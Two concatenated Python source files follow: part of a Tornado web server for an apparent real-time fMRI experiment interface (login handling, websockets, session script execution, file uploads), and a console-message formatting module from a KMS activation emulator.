for i in range(len(cb.responses)):
cb.semaphore.release()
del Web.dataCallbacks[callId]
except Exception as err:
logging.error('Web pruneCallbacks: error {}'.format(err))
finally:
Web.callbackLock.release()
@staticmethod
def sendUserMsgFromThread(msg):
Web.ioLoopInst.add_callback(Web.sendUserMessage, msg)
@staticmethod
def sendUserMessage(msg):
Web.wsConnLock.acquire()
try:
for client in Web.wsBrowserMainConns:
client.write_message(msg)
finally:
Web.wsConnLock.release()
@staticmethod
def sendBiofeedbackMsgFromThread(msg):
Web.ioLoopInst.add_callback(Web.sendBiofeedbackMessage, msg)
@staticmethod
def sendBiofeedbackMessage(msg):
Web.wsConnLock.acquire()
try:
for client in Web.wsBiofeedbackConns:
client.write_message(msg)
finally:
Web.wsConnLock.release()
@staticmethod
def addResultValue(request):
cmd = request.get('cmd')
if cmd != 'resultValue':
logging.warn('addResultValue: wrong cmd type {}'.format(cmd))
return
runId = request.get('runId')
x = request.get('trId')
y = request.get('value')
if not isinstance(runId, numbers.Number) or runId <= 0:
logging.warn('addResultValue: runId wrong val {}'.format(cmd))
return
# Make sure resultVals has at least as many arrays as runIds
for i in range(len(Web.resultVals), runId):
Web.resultVals.append([])
if not isinstance(x, numbers.Number):
# clear plot for this runId
Web.resultVals[runId-1] = []
return
# logging.info("Add resultVal {}, {}".format(x, y))
runVals = Web.resultVals[runId-1]
for i, val in enumerate(runVals):
if val['x'] == x:
runVals[i] = {'x': x, 'y': y}
return
runVals.append({'x': x, 'y': y})
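# Example of the bookkeeping above: addResultValue({'cmd': 'resultValue',
# 'runId': 2, 'trId': 5, 'value': 0.7}) grows Web.resultVals to two run lists
# and appends {'x': 5, 'y': 0.7} to the second one; a repeated trId overwrites
# the earlier point, and a non-numeric trId clears that run's plot.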
class UserHttp(tornado.web.RequestHandler):
def get_current_user(self):
return self.get_secure_cookie("login", max_age_days=maxDaysLoginCookieValid)
@tornado.web.authenticated
def get(self):
full_path = os.path.join(Web.htmlDir, Web.webIndexPage)
logging.log(DebugLevels.L6, 'Index request: pwd: {}'.format(full_path))
Web.httpLock.acquire()
try:
self.render(full_path)
finally:
Web.httpLock.release()
class BiofeedbackHttp(tornado.web.RequestHandler):
def get_current_user(self):
return self.get_secure_cookie("login", max_age_days=maxDaysLoginCookieValid)
@tornado.web.authenticated
def get(self):
full_path = os.path.join(Web.htmlDir, Web.webBiofeedPage)
logging.log(DebugLevels.L6, 'Subject feedback http request: pwd: {}'.format(full_path))
Web.httpLock.acquire()
try:
self.render(full_path)
finally:
Web.httpLock.release()
class LoginHandler(tornado.web.RequestHandler):
loginAttempts = {}
loginRetryDelay = 10
def get(self):
params = {
"error_msg": '',
"nextpage": self.get_argument("next", "/")
}
full_path = os.path.join(Web.htmlDir, Web.webLoginPage)
self.render(full_path, **params)
def post(self):
errorReply = None
try:
login_name = self.get_argument("name")
login_passwd = self.get_argument("password")
if Web.testMode is True:
if login_name == login_passwd == 'test':
self.set_secure_cookie("login", login_name, expires_days=maxDaysLoginCookieValid)
self.redirect(self.get_query_argument('next', '/'))
return
passwdFilename = os.path.join(certsDir, 'passwd')
passwdDict = loadPasswdFile(passwdFilename)
if login_name in passwdDict:
errorReply = self.checkRetry(login_name)
if errorReply is None:
hashed_passwd = passwdDict[login_name]
# checkpw expects bytes array rather than string so use .encode()
if bcrypt.checkpw(login_passwd.encode(), hashed_passwd.encode()) is True:
# Remove failed attempts entry
del Web.LoginHandler.loginAttempts[login_name]
self.set_secure_cookie("login", login_name, expires_days=maxDaysLoginCookieValid)
self.redirect(self.get_query_argument('next', '/'))
return
else:
errorReply = 'Login Error: Login Incorrect'
else:
errorReply = self.checkRetry('invalid_user')
if errorReply is None:
errorReply = 'Login Error: Login Incorrect'
except Exception as err:
errorReply = 'Exception: {} {}'.format(type(err), err)
assert errorReply is not None, "Assert: Web.LoginHandler.error not empty"
logging.warning('Login Failure: {}'.format(login_name))
params = {
"error_msg": errorReply,
"nextpage": self.get_query_argument('next', '/')
}
full_path = os.path.join(Web.htmlDir, Web.webLoginPage)
self.render(full_path, **params)
def checkRetry(self, user):
'''Keep a dictionary with one entry per username. Any user not in the
passwd file will be entered as 'invalid_user'. Record login failure
count and timestamp for when the next retry is allowed. Reset failed
retry count on successful login. Return message with how many seconds
until next login attempt is allowed.
'''
now = time.time()
loginAttempts = Web.LoginHandler.loginAttempts
retryTime = now + Web.LoginHandler.loginRetryDelay
loginTry = loginAttempts.get(user)
if loginTry is not None:
failedLogins = loginTry.get('failedLogins', 0)
nextAllowedTime = loginTry.get('nextAllowedTime', now)
# print('user: {}, tries {}, nextTime {}'.format(user, failedLogins, nextAllowedTime))
if nextAllowedTime > now:
delaySecs = loginTry['nextAllowedTime'] - now
return 'Next login retry allowed in {} sec'.format(int(delaySecs))
loginTry['failedLogins'] = failedLogins + 1
loginTry['nextAllowedTime'] = retryTime
loginAttempts[user] = loginTry
else:
loginAttempts[user] = {'failedLogins': 1, 'nextAllowedTime': retryTime}
return None
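# Worked example: with loginRetryDelay = 10, a failed attempt for 'alice' at
# t=100s stores {'failedLogins': 1, 'nextAllowedTime': 110}; a retry at t=105s
# returns "Next login retry allowed in 5 sec" without changing the entry, while
# a retry at t=112s proceeds to the password check (failedLogins becomes 2 and
# the next window moves to t=122s).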
class LogoutHandler(tornado.web.RequestHandler):
def get(self):
self.clear_cookie("login")
self.redirect("/login")
class BiofeedbackWebSocket(tornado.websocket.WebSocketHandler):
# TODO - combine these in-common setups into helper functions
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
response = {'cmd': 'error', 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "Biofeedback WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
Web.wsBiofeedbackConns.append(self)
finally:
Web.wsConnLock.release()
def on_close(self):
logging.log(DebugLevels.L1, "Biofeedback WebSocket closed")
Web.wsConnLock.acquire()
try:
if self in Web.wsBiofeedbackConns:
Web.wsBiofeedbackConns.remove(self)
finally:
Web.wsConnLock.release()
def on_message(self, message):
Web.browserBiofeedCallback(self, message)
class UserWebSocket(tornado.websocket.WebSocketHandler):
# def get(self, *args, **kwargs):
# if self.get_secure_cookie("login"):
# super(Web.BiofeedbackWebSocket, self).get(*args, **kwargs)
# else:
# What to do here when authentication fails?
# return
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
response = {'cmd': 'error', 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "User WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
Web.wsBrowserMainConns.append(self)
finally:
Web.wsConnLock.release()
def on_close(self):
logging.log(DebugLevels.L1, "User WebSocket closed")
Web.wsConnLock.acquire()
try:
if self in Web.wsBrowserMainConns:
Web.wsBrowserMainConns.remove(self)
else:
logging.log(DebugLevels.L1, "on_close: connection not in list")
finally:
Web.wsConnLock.release()
def on_message(self, message):
Web.browserMainCallback(self, message)
class EventWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
response = {'cmd': 'error', 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "Event WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
Web.wsEventConns.append(self)
finally:
Web.wsConnLock.release()
def on_close(self):
logging.log(DebugLevels.L1, "Event WebSocket closed")
Web.wsConnLock.acquire()
try:
if self in Web.wsEventConns:
Web.wsEventConns.remove(self)
finally:
Web.wsConnLock.release()
def on_message(self, message):
Web.eventCallback(self, message)
class DataWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
user_id = self.get_secure_cookie("login")
if not user_id:
logging.warning('Data websocket authentication failed')
response = {'cmd': 'error', 'status': 401, 'error': 'Websocket authentication failed'}
self.write_message(json.dumps(response))
self.close()
return
logging.log(DebugLevels.L1, "Data WebSocket opened")
self.set_nodelay(True)
Web.wsConnLock.acquire()
try:
# temporarily cache any previous connection
prevDataConn = Web.wsDataConn
# add new connection
Web.wsDataConn = self
# If there was a previous connection close it
if prevDataConn is not None:
prevDataConn.close()
except Exception as err:
logging.error('ProjectInterface: Open Data Socket error: {}'.format(err))
finally:
Web.wsConnLock.release()
print('DataWebSocket: connected {}'.format(self.request.remote_ip))
def on_close(self):
if Web.wsDataConn == self:
Web.wsConnLock.acquire()
Web.wsDataConn = None
Web.wsConnLock.release()
logging.log(DebugLevels.L1, "Data WebSocket closed")
else:
logging.log(DebugLevels.L1, "on_close: Data WebSocket mismatch")
self.close_pending_requests()
def close_pending_requests(self):
Web.callbackLock.acquire()
try:
# signal the close to anyone waiting for replies
callIdsToRemove = []
for callId, cb in Web.dataCallbacks.items():
if cb.dataConn == self:
callIdsToRemove.append(callId)
cb.status = 499
cb.error = 'Client closed connection'
# TODO - check this logic
cb.responses.append({'cmd': 'unknown', 'status': cb.status, 'error': cb.error})
for i in range(len(cb.responses)):
cb.semaphore.release()
for callId in callIdsToRemove:
Web.dataCallbacks.pop(callId, None)
finally:
Web.callbackLock.release()
def on_message(self, message):
try:
Web.dataCallback(self, message)
except Exception as err:
logging.error('DataWebSocket: on_message error: {}'.format(err))
def loadPasswdFile(filename):
with open(filename, 'r') as fh:
entries = fh.readlines()
passwdDict = {k: v for (k, v) in [line.strip().split(',') for line in entries]}
return passwdDict
def storePasswdFile(filename, passwdDict):
with open(filename, 'w') as fh:
for k, v in passwdDict.items():
fh.write('{},{}\n'.format(k, v))
def getCookieSecret(dir):
filename = os.path.join(dir, 'cookie-secret')
if os.path.exists(filename):
with open(filename, mode='rb') as fh:
cookieSecret = fh.read()
else:
cookieSecret = uuid.uuid4().bytes
with open(filename, mode='wb') as fh:
fh.write(cookieSecret)
return cookieSecret
#####################
# Callback Functions
#####################
def defaultBrowserMainCallback(client, message):
request = json.loads(message)
if 'config' in request:
# Common code for any command that sends config information - retrieve the config info
cfgData = request['config']
newCfg = recurseCreateStructDict(cfgData)
if newCfg is not None:
Web.cfg = newCfg
else:
if cfgData is None:
errStr = 'browserMainCallback: Config field is None'
elif type(cfgData) not in (dict, list):
errStr = 'browserMainCallback: Config field wrong type {}'.format(type(cfgData))
else:
errStr = 'browserMainCallback: Error parsing config field {}'.format(cfgData)
Web.setUserError(errStr)
return
cmd = request['cmd']
logging.log(DebugLevels.L3, "WEB USER CMD: %s", cmd)
if cmd == "getDefaultConfig":
# TODO - may need to remove certain fields that can't be jsonified
if Web.configFilename is not None and Web.configFilename != '':
cfg = loadConfigFile(Web.configFilename)
else:
cfg = Web.cfg
Web.sendUserConfig(cfg, filename=Web.configFilename)
elif cmd == "getDataPoints":
Web.sendUserDataVals(Web.resultVals)
elif cmd == "clearDataPoints":
Web.resultVals = [[{'x': 0, 'y': 0}]]
elif cmd == "run" or cmd == "initSession" or cmd == "finalizeSession":
if Web.runInfo.threadId is not None:
Web.runInfo.threadId.join(timeout=1)
if Web.runInfo.threadId.is_alive():
Web.setUserError("Client thread already runnning, skipping new request")
return
Web.runInfo.threadId = None
Web.runInfo.stopRun = False
if cmd == 'run':
sessionScript = Web.fmriPyScript
tag = 'running'
logType = 'run'
elif cmd == 'initSession':
sessionScript = Web.initScript
tag = 'initializing'
logType = 'prep'
elif cmd == "finalizeSession":
sessionScript = Web.finalizeScript
tag = 'finalizing'
logType = 'prep'
if sessionScript is None or sessionScript == '':
Web.setUserError("{} script not set".format(cmd))
return
Web.runInfo.threadId = threading.Thread(name='sessionThread', target=runSession,
args=(Web.cfg, sessionScript,
Web.filesremote, tag, logType))
Web.runInfo.threadId.setDaemon(True)
Web.runInfo.threadId.start()
elif cmd == "stop":
if Web.runInfo.threadId is not None:
Web.runInfo.stopRun = True
Web.runInfo.threadId.join(timeout=1)
if not Web.runInfo.threadId.is_alive():
Web.runInfo.threadId = None
Web.runInfo.stopRun = False
elif cmd == "uploadFiles":
if Web.runInfo.uploadThread is not None:
Web.runInfo.uploadThread.join(timeout=1)
if Web.runInfo.uploadThread.is_alive():
Web.setUserError("Upload thread already runnning, skipping new request")
return
Web.runInfo.uploadThread = threading.Thread(name='uploadFiles',
target=uploadFiles,
args=(request,))
Web.runInfo.uploadThread.setDaemon(True)
Web.runInfo.uploadThread.start()
else:
Web.setUserError("unknown command " + cmd)
def defaultBrowserBiofeedCallback(client, message):
request = json.loads(message)
cmd = request['cmd']
logging.log(DebugLevels.L3, "WEB SUBJ CMD: %s", cmd)
print('Subject Callback: {}'.format(cmd))
def defaultEventCallback(client, message):
request = json.loads(message)
cmd = request['cmd']
logging.log(DebugLevels.L3, "WEB EVENT CMD: %s", cmd)
print('Event Callback: {}'.format(cmd))
def runSession(cfg, pyScript, filesremote, tag, logType='run'):
# write out config file for use by pyScript
if logType == 'run':
configFileName = os.path.join(Web.confDir, 'cfg_sub{}_day{}_run{}.toml'.
format(cfg.subjectName, cfg.subjectDay, cfg.runNum[0]))
else:
configFileName = os.path.join(Web.confDir, 'cfg_sub{}_day{}_{}.toml'.
format(cfg.subjectName, cfg.subjectDay, tag))
with open(configFileName, 'w+') as fd:
toml.dump(cfg, fd)
# specify -u python option to disable buffering print commands
cmdStr = 'python -u {} -c {}'.format(pyScript, configFileName)
# set option for remote file requests
if filesremote is True:
cmdStr += ' -x'
# Create a project commPipe even if using local files so we can send
# classification results to the subject feedback window
commPipes = makeFifo()
cmdStr += ' --commpipe {}'.format(commPipes.fifoname)
# start thread listening for remote file requests on fifo queue
fifoThread = threading.Thread(name='fifoThread', target=commPipeRequestHandler, args=(commPipes,))
fifoThread.setDaemon(True)
fifoThread.start()
# print(cmdStr)
cmd = shlex.split(cmdStr)
proc = subprocess.Popen(cmd, cwd=rootDir, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
# send running status to user web page
response = {'cmd': 'runStatus', 'status': tag}
Web.sendUserMsgFromThread(json.dumps(response))
# start a separate thread to read the process output
lineQueue = queue.Queue()
outputThread = threading.Thread(target=procOutputReader, args=(proc, lineQueue))
outputThread.setDaemon(True)
outputThread.start()
line = 'start'
while(proc.poll() is None or line != ''):
# subprocess poll returns None while subprocess is running
if Web.runInfo.stopRun is True:
# signal the process to exit by closing stdin
proc.stdin.close()
try:
line = lineQueue.get(block=True, timeout=1)
except queue.Empty:
line = ''
if line != '':
if logType == 'run':
Web.userLog(line)
else:
Web.sessionLog(line)
logging.info(line.rstrip())
# processing complete, set status
endStatus = tag + ' complete \u2714'
if Web.runInfo.stopRun is True:
endStatus = 'stopped'
response = {'cmd': 'runStatus', 'status': endStatus}
Web.sendUserMsgFromThread(json.dumps(response))
outputThread.join(timeout=1)
if outputThread.is_alive():
print("OutputThread failed to exit")
# make sure fifo thread has exited
if fifoThread is not None:
signalFifoExit(fifoThread, commPipes)
return
def procOutputReader(proc, lineQueue):
for bline in iter(proc.stdout.readline, b''):
line = bline.decode('utf-8')
# check if line has error in it and print to console
if re.search('error', line, re.IGNORECASE):
print(line)
# send to output queue
lineQueue.put(line)
if line == '':
break
def repeatPipeRequestHandler(commPipes):
while True:
commPipeRequestHandler(commPipes)
def commPipeRequestHandler(commPipes):
'''A thread routine that listens for requests from a process through a pair of named pipes.
This allows another process to send project requests without directly integrating
the projectInterface into the process.
Listens on an fd_in pipe for requests and writes the results back on the fd_out pipe.
'''
commPipes.fd_out = open(commPipes.name_out, mode='w', buffering=1)
commPipes.fd_in = open(commPipes.name_in, mode='r')
try:
while True:
msg = commPipes.fd_in.readline()
if len(msg) == 0:
# fifo closed
break
# parse command
cmd = json.loads(msg)
response = processPyScriptRequest(cmd)
try:
commPipes.fd_out.write(json.dumps(response) + os.linesep)
except BrokenPipeError:
print('handleFifoRequests: pipe broken')
break
# End while loop
finally:
logging.info('handleFifo thread exit')
commPipes.fd_in.close()
commPipes.fd_out.close()
def processPyScriptRequest(request):
if 'cmd' not in request:
raise StateError('handleFifoRequests: cmd field not in request: {}'.format(request))
cmd = request['cmd']
route = request.get('route')
localtimeout = request.get('timeout', 10) + 5
response = StructDict({'status': 200})
if route == 'dataserver':
try:
response = Web.sendDataMsgFromThread(request, timeout=localtimeout)
if response is None:
raise StateError('handleFifoRequests: Response None from sendDataMessage')
if 'status' not in response:
raise StateError('handleFifoRequests: status field missing from response: {}'.format(response))
if response['status'] not in (200, 408):
if 'error' not in response:
raise StateError('handleFifoRequests: error field missing from response: {}'.format(response))
Web.setUserError(response['error'])
logging.error('handleFifo status {}: {}'.format(response['status'], response['error']))
except Exception as err:
errStr = 'SendDataMessage Exception type {}: error {}:'.format(type(err), str(err))
response = {'status': 400, 'error': errStr}
Web.setUserError(errStr)
logging.error('handleFifo Exception: {}'.format(errStr))
raise err
else:
if cmd == 'webCommonDir':
response.filename = CommonOutputDir
elif cmd == 'resultValue':
try:
# forward to bioFeedback Display
Web.sendBiofeedbackMsgFromThread(json.dumps(request))
# forward to main browser window
Web.sendUserMsgFromThread(json.dumps(request))
# Accumulate results locally to resend to browser as needed
Web.addResultValue(request)
except Exception as err:
errStr = 'SendClassification Exception type {}: error {}:'.format(type(err), str(err))
response = {'status': 400, 'error': errStr}
Web.setUserError(errStr)
logging.error('handleFifo Exception: {}'.format(errStr))
raise err
elif cmd == 'subjectDisplay':
logging.info('subjectDisplay projectInterface Callback')
return response
def signalFifoExit(fifoThread, commPipes):
'''Under normal exit conditions the fifoThread will exit when the fifo filehandles
are closed. However, if the fifo filehandles were never opened by both ends, the
fifoThread can block waiting for them to open. To handle that case we open both
filehandles with the O_NONBLOCK flag: if the fifo thread reader is still listening,
the handles open and close normally; if not, the open raises OSError, meaning the
fifoThread has already exited and closed its fifo filehandles.
'''
if fifoThread is None:
return
try:
pipeout = os.open(commPipes.name_out, os.O_RDONLY | os.O_NONBLOCK)
os.close(pipeout)
# trigger context swap to allow handleFifoRequests to open next pipe if needed
time.sleep(0.1)
pipein = os.open(commPipes.name_in, os.O_WRONLY | os.O_NONBLOCK)
os.close(pipein)
except OSError as err:
# No reader/writer listening on file so fifoThread already exited
# print('signalFifoExit: exception {}'.format(err))
pass
fifoThread.join(timeout=1)
if fifoThread.is_alive():
raise StateError('runSession: fifoThread not completed')
def handleDataRequest(cmd):
savedError = None
incomplete = True
while incomplete:
response = Web.sendDataMsgFromThread(cmd, timeout=60)
if response.get('status') != 200:
raise RequestError('handleDataRequest: status not 200: {}'.format(response.get('status')))
try:
data = unpackDataMessage(response)
except Exception as err:
logging.error('handleDataRequest: unpackDataMessage: {}'.format(err))
if savedError is None:
savedError = err
cmd['callId'] = response.get('callId', -1)
incomplete = response.get('incomplete', False)
if savedError:
raise RequestError('handleDataRequest: unpackDataMessage: {}'.format(savedError))
return data
def uploadFiles(request):
if 'cmd' not in request or request['cmd'] != "uploadFiles":
raise StateError('uploadFiles: incorrect cmd request: {}'.format(request))
if Web.wsDataConn is None:
# A remote fileWatcher hasn't connected yet
errStr = 'Waiting for fileWatcher to attach, please try again momentarily'
Web.setUserError(errStr)
return
try:
srcFile = request['srcFile']
compress = request['compress']
except KeyError as err:
Web.setUserError("UploadFiles request missing a parameter: {}".format(err))
return
# get the list of files to upload
cmd = listFilesReqStruct(srcFile)
response = Web.sendDataMsgFromThread(cmd, timeout=10)
if response.get('status') != 200:
Web.setUserError("Error listing files {}: {}".
format(srcFile, response.get('error')))
return
fileList = response.get('fileList')
if type(fileList) is not list:
Web.setUserError("Invalid fileList reponse type {}: expecting list".
format(type(fileList)))
return
if len(fileList) == 0:
response = {'cmd': 'uploadProgress', 'file': 'No Matching Files'}
Web.sendUserMsgFromThread(json.dumps(response))
return
for file in fileList:
try:
cmd = getFileReqStruct(file, compress=compress)
data = handleDataRequest(cmd)
# write the returned data out to a file
filename = response.get('filename')
if filename is None:
if 'data' in response: del response['data']
raise StateError('sendDataRequestToFile: filename field not in response: {}'.format(response))
# prepend with common output path and write out file
# note: can't just use os.path.join() because it discards earlier path elements
# when a later element is an absolute path
global CommonOutputDir
outputFilename = os.path.normpath(CommonOutputDir + filename)
dirName = os.path.dirname(outputFilename)
if not os.path.exists(dirName):
os.makedirs(dirName)
writeFile(outputFilename, data)
response['filename'] = outputFilename
except Exception as err:
Web.setUserError(
"Error uploading file {}: {}".format(file, str(err)))
return
response = {'cmd': 'uploadProgress', 'file': file}
Web.sendUserMsgFromThread(json.dumps(response))
response = {'cmd': 'uploadProgress', 'file': '------upload complete------'}
Web.sendUserMsgFromThread(json.dumps(response))
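# --- Illustrative sketch (not part of the original file) ---------------------
# The comm-pipe protocol served by commPipeRequestHandler() above is line-oriented
# JSON: a session script writes one JSON request per line to the pipe the server
# reads from (commPipes.name_in) and reads one JSON response line from the pipe
# the server writes to (commPipes.name_out). The helper below is a hypothetical
# client-side sketch; the real pipe paths come from makeFifo() and are handed to
# the session script via the --commpipe argument in runSession().
def exampleCommPipeRequest(nameInPath, nameOutPath, request):
    # Open the response pipe for reading first so the server's blocking
    # open(name_out, 'w') can complete, then open the request pipe for writing.
    respPipe = open(nameOutPath, mode='r')
    reqPipe = open(nameInPath, mode='w', buffering=1)
    try:
        reqPipe.write(json.dumps(request) + os.linesep)
        return json.loads(respPipe.readline())
    finally:
        reqPipe.close()
        respPipe.close()
# Example with hypothetical pipe paths:
# exampleCommPipeRequest('/tmp/commpipe.toServer', '/tmp/commpipe.fromServer',
#                        {'cmd': 'webCommonDir'})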
|
pykms_Format.py
|
#!/usr/bin/env python3
from __future__ import print_function, unicode_literals
import re
import sys
import threading
try:
# Python 2.x imports
from StringIO import StringIO
import Queue as Queue
except ImportError:
# Python 3.x imports
from io import StringIO
import queue as Queue
pyver = sys.version_info[:2]
#----------------------------------------------------------------------------------------------------------------------------------------------------------
def enco(strg, typ = 'latin-1'):
if pyver >= (3, 0):
if isinstance(strg, str):
strgenc = strg.encode(typ)
return strgenc
else:
return strg
def deco(strg, typ = 'latin-1'):
if pyver >= (3, 0):
if isinstance(strg, bytes):
strgdec = strg.decode(typ)
return strgdec
else:
return strg
def byterize(obj):
def do_encode(dictio, key):
if isinstance(dictio[key], str) and len(dictio[key]) > 0 and key not in ['SecondaryAddr']:
dictio[key] = dictio[key].encode('latin-1')
elif hasattr(dictio[key], '__dict__'):
subdictio = dictio[key].__dict__['fields']
for subkey in subdictio:
do_encode(subdictio, subkey)
if pyver >= (3, 0):
objdict = obj.__dict__['fields']
for field in objdict:
do_encode(objdict, field)
return obj
def justify(astring, indent = 35, break_every = 100):
str_indent = ('\n' + ' ' * indent)
splitted = astring.split('\n')
longests = [(n, s) for n, s in enumerate(splitted) if len(s) >= break_every]
for longest in longests:
lines = []
for i in range(0, len(longest[1]), break_every):
lines.append(longest[1][i : i + break_every])
splitted[longest[0]] = str_indent.join(lines)
if len(splitted) > 1:
justy = str_indent.join(splitted)
else:
justy = str_indent + str_indent.join(splitted)
return justy
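# --- Illustrative sketch (not part of the original module) -------------------
# justify() re-wraps any line of `astring` longer than `break_every` characters,
# prefixing the continuation lines with `indent` spaces. The helper below only
# documents that behaviour and is not used elsewhere in this module.
def _justify_example():
    wrapped = justify('x' * 12, indent = 4, break_every = 5)
    # wrapped == '\n    xxxxx\n    xxxxx\n    xx'
    return wrapped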
##----------------------------------------------------------------------------------------------------------------------------------------------------
ColorMap = {'red' : '\x1b[91m',
'green' : '\x1b[92m',
'yellow' : '\x1b[93m',
'blue' : '\x1b[94m',
'magenta' : '\x1b[95m',
'cyan' : '\x1b[96m',
'white' : '\x1b[97m'
}
ExtraMap = {'end' : '\x1b[0m',
'bold' : '\x1b[1m',
'dim' : '\x1b[2m',
'italic' : '\x1b[3m',
'underlined' : '\x1b[4m',
'blink1' : '\x1b[5m',
'blink2' : '\x1b[6m',
'reverse' : '\x1b[7m',
'hidden' : '\x1b[8m',
'strike' : '\x1b[9m'
}
ColorExtraMap = dict(ColorMap, **ExtraMap)
MsgMap = {0 : {'text' : "{yellow}\n\t\t\tClient generating RPC Bind Request...{end}", 'where' : "clt"},
1 : {'text' : "{white}<==============={end}{yellow}\tClient sending RPC Bind Request...{end}", 'where' : "clt"},
2 : {'text' : "{yellow}Server received RPC Bind Request !!!\t\t\t\t{end}{white}<==============={end}", 'where' : "srv"},
3 : {'text' : "{yellow}Server parsing RPC Bind Request...{end}", 'where' : "srv"},
4 : {'text' : "{yellow}Server generating RPC Bind Response...{end}", 'where' : "srv"},
5 : {'text' : "{yellow}Server sending RPC Bind Response...\t\t\t\t{end}{white}===============>{end}", 'where' : "srv"},
6 : {'text' : "{green}{bold}RPC Bind acknowledged !!!\n\n{end}", 'where' : "srv"},
7 : {'text' : "{white}===============>{end}{yellow}\tClient received RPC Bind Response !!!{end}", 'where' : "clt"},
8 : {'text' : "{green}{bold}\t\t\tRPC Bind acknowledged !!!\n{end}", 'where' : "clt"},
9 : {'text' : "{blue}\t\t\tClient generating Activation Request dictionary...{end}", 'where' : "clt"},
10 : {'text' : "{blue}\t\t\tClient generating Activation Request data...{end}", 'where' : "clt"},
11 : {'text' : "{blue}\t\t\tClient generating RPC Activation Request...{end}", 'where' : "clt"},
12 : {'text' : "{white}<==============={end}{blue}\tClient sending RPC Activation Request...\n\n{end}", 'where' : "clt"},
13 : {'text' : "{blue}Server received RPC Activation Request !!!\t\t\t{end}{white}<==============={end}", 'where' : "srv"},
14 : {'text' : "{blue}Server parsing RPC Activation Request...{end}", 'where' : "srv"},
15 : {'text' : "{blue}Server processing KMS Activation Request...{end}", 'where' : "srv"},
16 : {'text' : "{blue}Server processing KMS Activation Response...{end}", 'where' : "srv"},
17 : {'text' : "{blue}Server generating RPC Activation Response...{end}", 'where' : "srv"},
18 : {'text' : "{blue}Server sending RPC Activation Response...\t\t\t{end}{white}===============>{end}", 'where' : "srv"},
19 : {'text' : "{green}{bold}Server responded, now in Stand by...\n{end}", 'where' : "srv"},
20 : {'text' : "{white}===============>{end}{blue}\tClient received Response !!!{end}", 'where' : "clt"},
21 : {'text' : "{green}{bold}\t\t\tActivation Done !!!{end}", 'where' : "clt"},
-1 : {'text' : "{white}Server receiving{end}", 'where' : "clt"},
-2 : {'text' : "{white}\n\n\t\t\t\t\t\t\t\tClient sending{end}", 'where' : "srv"},
-3 : {'text' : "{white}\t\t\t\t\t\t\t\tClient receiving{end}", 'where' : "srv"},
-4 : {'text' : "{white}\n\nServer sending{end}", 'where' : "clt"}
}
def pick_MsgMap(messagelist):
pattern = r"(?<!\{)\{([^}]+)\}(?!\})"
picktxt, pickarrw = [ [] for _ in range(2) ]
for messageitem in messagelist:
picklist = re.sub(pattern, '*', messageitem['text'])
picklist = list(filter(None, picklist.split('*')))
picktxt.append(picklist[0])
try:
pickarrw.append(picklist[1])
except IndexError:
pass
return picktxt, pickarrw
def unshell_MsgMap(arrows):
unMsgMap = {}
for key, values in MsgMap.items():
txt = pick_MsgMap([values])
if txt[0][0] in arrows:
unMsgMap.update({txt[1][0] : values['where']})
else:
unMsgMap.update({txt[0][0] : values['where']})
return unMsgMap
#-------------------------------------------------------------------------------------------------------------------------------------------------------
# https://stackoverflow.com/questions/230751/how-to-flush-output-of-print-function
if pyver < (3, 3):
old_print = print
def print(*args, **kwargs):
flush = kwargs.pop('flush', False)
old_print(*args, **kwargs)
if flush:
file = kwargs.get('file', sys.stdout)
file.flush() if file is not None else sys.stdout.flush()
# https://ryanjoneil.github.io/posts/2014-02-14-capturing-stdout-in-a-python-child-process.html
class ShellMessage(object):
view = None
class Collect(StringIO):
# Capture string sent to stdout.
def write(self, s):
StringIO.write(self, s)
class Process(object):
def __init__(self, nshell):
self.nshell = nshell
self.print_queue = Queue.Queue()
def run(self):
if not ShellMessage.view:
return
# Start thread process.
print_thread = threading.Thread(target = self.spawn(), args=(self.print_queue,))
print_thread.setDaemon(True)
print_thread.start()
# Do something with output.
toprint = self.read(0.1) # 0.1 s to let the shell output the result
# Redirect output.
if sys.stdout.isatty():
print(toprint)
else:
from pykms_GuiBase import gui_redirect # Import after variables creation.
gui_redirect(toprint)
def spawn(self):
# Save everything that would otherwise go to stdout.
outstream = ShellMessage.Collect()
sys.stdout = outstream
try:
# Print something.
if isinstance(self.nshell, list):
for n in self.nshell:
print(MsgMap[n]['text'].format(**ColorExtraMap), flush = True)
else:
print(MsgMap[self.nshell]['text'].format(**ColorExtraMap), flush = True)
finally:
# Restore stdout and send content.
sys.stdout = sys.__stdout__
try:
self.print_queue.put(outstream.getvalue())
except Queue.Full:
pass
def read(self, timeout = None):
try:
toprint = self.print_queue.get(block = timeout is not None, timeout = timeout)
self.print_queue.task_done()
return toprint
except Queue.Empty:
return None
def unshell_message(ansi_string, m):
ansi_find = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
ansi_list = re.findall(ansi_find, ansi_string)
ansi_indx_start = [ n for n in range(len(ansi_string)) for ansi in list(set(ansi_list)) if ansi_string.find(ansi, n) == n ]
ansi_indx_stop = [ n + len(value) for n, value in zip(ansi_indx_start, ansi_list)]
ansi_indx = sorted(list(set(ansi_indx_start + ansi_indx_stop)))
msgcolored = {}
ColorMapReversed = dict(zip(ColorMap.values(), ColorMap.keys()))
ExtraMapReversed = dict(zip(ExtraMap.values(), ExtraMap.keys()))
for k in range(len(ansi_indx) - 1):
ansi_value = ansi_string[ansi_indx[k] : ansi_indx[k + 1]]
if ansi_value != '\x1b[0m':
tagname = "tag" + str(m).zfill(2)
if tagname not in msgcolored:
msgcolored[tagname] = {'color' : '', 'extra' : [], 'text' : ''}
if ansi_value in ColorMapReversed.keys():
msgcolored[tagname]['color'] = ColorMapReversed[ansi_value]
elif ansi_value in ExtraMapReversed.keys():
msgcolored[tagname]['extra'].append(ExtraMapReversed[ansi_value])
else:
msgcolored[tagname]['text'] = ansi_value
else:
m += 1
# Ordering.
msgcolored = dict(sorted(msgcolored.items()))
